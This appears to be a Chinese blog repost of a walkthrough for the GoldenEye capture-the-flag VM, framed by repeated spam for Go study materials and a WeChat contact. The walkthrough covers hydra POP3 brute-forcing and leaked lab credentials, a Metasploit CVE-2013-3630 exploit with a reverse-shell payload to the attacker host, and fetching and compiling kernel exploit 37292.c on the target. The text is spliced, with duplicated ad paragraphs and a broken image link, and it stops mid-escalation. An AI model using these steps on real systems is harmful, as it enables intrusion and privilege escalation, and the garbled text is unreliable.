先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7
深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年最新Golang全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上Go语言开发知识点,真正体系化!
由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新
如果你需要这些资料,可以添加V获取:vip1024b (备注go)
正文
第二封邮件:
好的 Natalyn 我有一个新学生给你。 由于这是一个新系统,如果您看到任何配置问题,请告诉我或鲍里斯,尤其是它与安全有关的问题……即使不是,也只需以“安全”为幌子输入……它就会 轻松升级变更单:)
好的,用户信用是:
username:xenia
password:RCP90rulez!
鲍里斯验证了她是一个有效的承包商,所以只需创建帐户好吗?
如果您没有外部内部域的 URL:severnaya-station.com/gnocertdir
**请务必编辑您的主机文件,因为您通常在远程离线工作…
由于您是 Linux 用户,因此只需将此服务器 IP 指向 /etc/hosts 中的 severnaya-station.com。
其中第二封邮件给出重要信息账号密码和内部域
配置本地HOSTS文件
vim /etc/hosts
192.168.10.134 severnaya-station.com
在打开网址severnaya-station.com/gnocertdir/
发现这里有Moodle cms框架,点击:
发现有需要输入账号密码,用之前邮箱里给的账号密码进入看看,上面邮件里用户xenia的。
成功进入
这里又看到一个人名doak
我们将他写入我们的txt中
继续拿去爆破hydra -L labi.txt -P /usr/share/wordlists/fasttrack.txt 192.168.10.134 -s 55007 pop3
这里也可以-l指定用户名hydra -l doak -P /usr/share/wordlists/fasttrack.txt 192.168.10.134 -s 55007 pop3
爆破出来login: doak password: goat
继续用nc去连接查看信息
邮件消息说,为我们提供了更多登录凭据以登录到应用程序。让我们尝试使用这些凭据登录。
用户名:dr_doak
密码:4England!
回到之前浏览器界面登陆一下
有一个版本号有一个txt,打开txt看看有什么好东西:
还是那句话英语太烂了,拿去翻译一下
他说更多的东西在图片的目录里,那我们看看吧
是上面这张图片下载下来wget http://192.168.10.134/dir007key/for-007.jpg
这里我们可以用exiftool(图虫)看一下图片里有没有什么隐藏信息,这里涉及一些ctf知识,大家不用担心,不会咱们就去查。
一眼就看到这里很奇怪是个base64编码的我们去解码一下
解码的结果是xWinter1995x!其中有说,这是管理员用户的密码。管理员用户身份继续登陆应用程序。那就可以试试用户名:admin密码:xWinter1995x!的登陆
成功进入到管理员的界面,可以看到我们的管理员界面了该干嘛?getshell干嘛,愣着啊!一些常见getshell手段:文件包含漏洞、SQL注入漏洞、文件上传漏洞、暴力破解、木马攻击。如果我们知道该系统存在的历史漏洞,我们也可以通过历史漏洞来拿shell。
通过搜索可以看到我们可以利用漏洞CVE-2013-3630
这里我们可以利用msf这款工具:Metasploit Framework(MSF)是一款开源安全漏洞监测工具,该工具已附带数千个已知的软件漏洞,且仍在保持更新。
msfconsole #进入MSF框架攻击界面
search moodle #查找 moodle类型漏洞
use 1 #调用1 exp
show options #查看需要什么条件
看到这里也有我们之前找的漏洞CVE-2013-3630
在use 1调用exp,在show options看一下需要什么条件。
根据给出的一个一个设置:
set username admin #设置用户名
set password xWinter1995x! #设置密码
set rhost severnaya-station.com #设置:rhosts
set targeturi /gnocertdir #设置目录: /
然后在设置payload让他回弹set payload cmd/unix/reverse
在输入show options
看看还需要设置什么。
需要设置LHOST,本机IP是192.168.10.132,输入set lhost 192.168.10.132
让他回来找咱们,这里我们还不可以run。我们还需要修改执行PSpellShell,在次登陆admin的账户依次点击
改成PSpellShell在点击保存
然后就可以run了
这里显示已经成功建立会话,看一下现在的用户whoami
看看有没有装python,如果装了python的话可以输入python -c 'import pty; pty.spawn("/bin/bash")'
这是一个 Python 命令,用于在交互式 Bash shell 中执行命令。命令中 pty 模块提供了一个伪终端接口,使得可以在终端上执行命令并输出结果。具体来说,pty.spawn(“/bin/bash”) 命令会创建一个 Bash 进程,并将其连接到伪终端。然后,你可以在 Bash shell 中执行任意命令,并且可以使用 TAB 键自动完成命令和路径。这个命令通常被用于在渗透测试和攻击中,以获取更高的权限或者用于维持对目标系统的访问。它可以帮助攻击者欺骗目标系统,使其认为攻击者已经获得了更高的权限或控制权。
现在我们是已经拿到了该主机的权限,接下来要做的就是提权了,首先查看下该主机版本号uname -a
这里可以看到是Linux ubuntu 3.13.0版本的,那么接下来我们查一下有没有攻击脚本给我们利用一下
还真有
看到这里是由gcc编译的,所以对方的主机中需要安装gcc,这里看看gcc安装了没gcc -h
很明显并没有安装。
在cc -h
看下有没有安装cc编译,可以看到存在该目录。
在我们kali攻击机中也有漏洞库的可以通过searchsploit 37292
查看
用cp /usr/share/exploitdb/exploits/linux/local/37292.c /root/Desktop/
把他复制到我们的桌面上来。
用vim 37292.c来编辑一下
把这里gcc编译的改为cc保存后退出。开启一个python -m http.server 8085
端口的一个服务
这里我们回到之前主机操作,进入tmp目录。
利用wget http://192.168.10.129:8085/37292.c
下载http服务中的文件
下载成功后我们执行cc编译cc 37292.c -o labi
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
需要这份系统化的资料的朋友,可以添加V获取:vip1024b (备注Go)
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
5abcde8ee5b7e649e.png](https://i-blog.csdnimg.cn/blog_migrate/ac40037fd52d7ec12d4f220d5f4032fa.png)
下载成功后我们执行cc编译cc 37292.c -o labi
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
需要这份系统化的资料的朋友,可以添加V获取:vip1024b (备注Go)
[外链图片转存中…(img-zUuloDYm-1713267562939)]
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!